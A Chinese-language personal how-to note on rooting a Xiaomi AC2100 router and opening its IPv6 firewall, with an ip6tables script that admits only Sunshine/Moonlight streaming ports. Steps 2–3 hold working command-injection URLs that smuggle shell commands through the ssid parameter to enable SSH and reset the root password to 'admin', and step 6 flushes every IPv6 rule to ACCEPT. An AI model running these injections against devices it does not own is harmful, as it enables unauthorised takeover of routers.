小米路由器AC2100關閉IPV6防火墻

參考

https://github.com/AXFOX/openwrt-AC2100

步驟

1. http://192.168.31.1/cgi-bin/luci/;stok=???/web/home#router
2. http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
3. http://192.168.31.1/cgi-bin/luci/;stok=???/api/misystem/set_config_iotdev?bssid=gallifrey&user_id=doctor&ssid=-h%0Aecho%20-e%20%27admin%5Cnadmin%27%20%7C%20passwd%20root%0A
4. 以上是通過腳本注入重置root密碼 admin
5. ssh root@192.168.31.1
6. ip6tables -F;ip6tables -X;ip6tables -P INPUT ACCEPT;ip6tables -P OUTPUT ACCEPT;ip6tables -P FORWARD ACCEPT

常見問題

Unable to negotiate with 192.168.31.1 port 22: no matching host key type found. Their offer: ssh-rsa

解決 ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.31.1

為了安全 下面是我只允許sunshine+moonlight串流的規則

# ======================
# 1. 配置參數
# ======================

# Sunshine + Moonlight 所需端口列表
# TCP: 47984, 47989:47990, 47998:48000, 48010, 53333
# UDP: 47984, 47998:48000, 48010
# 考慮到用戶給出的端口列表，這里將進行整合。
PORTS_TCP="47984 47989 47990 47998 47999 48000 48010 53333"
PORTS_UDP="47984 47998 47999 48000 48010"

# 路由器 WAN 口的接口名稱
WAN_INTERFACE="pppoe-wan"
# 內部局域網的接口名稱
LAN_INTERFACE="br-lan"

# ======================
# 2. 清除舊規則 (在測試時很有用)
# ======================
ip6tables -F
ip6tables -X
ip6tables -Z

# ======================
# 3. 基礎防火墻策略
# ======================
# 默認策略：允許發出的，但阻止進來的和轉發的
ip6tables -P INPUT DROP
ip6tables -P FORWARD DROP
ip6tables -P OUTPUT ACCEPT

# 允許已建立和相關連接通過
ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
ip6tables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT

# 允許本地環回接口
ip6tables -A INPUT -i lo -j ACCEPT

# 允許 ICMPv6 (IPv6 協議正常運行所必需)
ip6tables -A INPUT -p icmpv6 -j ACCEPT

# ======================
# 4. Sunshine + Moonlight 端口放行規則
# ======================

# 遍歷 TCP 端口列表，允許來自公網的流量轉發到內網
for port in $PORTS_TCP; do
  # 將流量從 WAN 接口轉發到 LAN 接口，目標端口為 Sunshine TCP 端口
  ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p tcp --dport $port -j ACCEPT
done

# 遍歷 UDP 端口列表，允許來自公網的流量轉發到內網
for port in $PORTS_UDP; do
  # 將流量從 WAN 接口轉發到 LAN 接口，目標端口為 Sunshine UDP 端口
  ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport $port -j ACCEPT
done

# 允許 UPnP / NAT-PMP 自動端口映射的流量（如果 Sunshine 配置了 UPnP）
ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport 1900 -j ACCEPT
ip6tables -A FORWARD -i $WAN_INTERFACE -o $LAN_INTERFACE -p udp --dport 5351 -j ACCEPT

# ======================
# 5. 安全加固
# ======================

# 阻止無效數據包
ip6tables -A INPUT -m conntrack --ctstate INVALID -j DROP
ip6tables -A FORWARD -m conntrack --ctstate INVALID -j DROP

# 防止常見的 SYN 攻擊
ip6tables -A FORWARD -p tcp --tcp-flags SYN,ACK SYN,ACK -m state --state NEW -j DROP

echo "IPv6 Sunshine firewall rules have been applied successfully."

查看IPV6 ip

curl -6 https://ident.me

curl -6 https://api6.ipify.org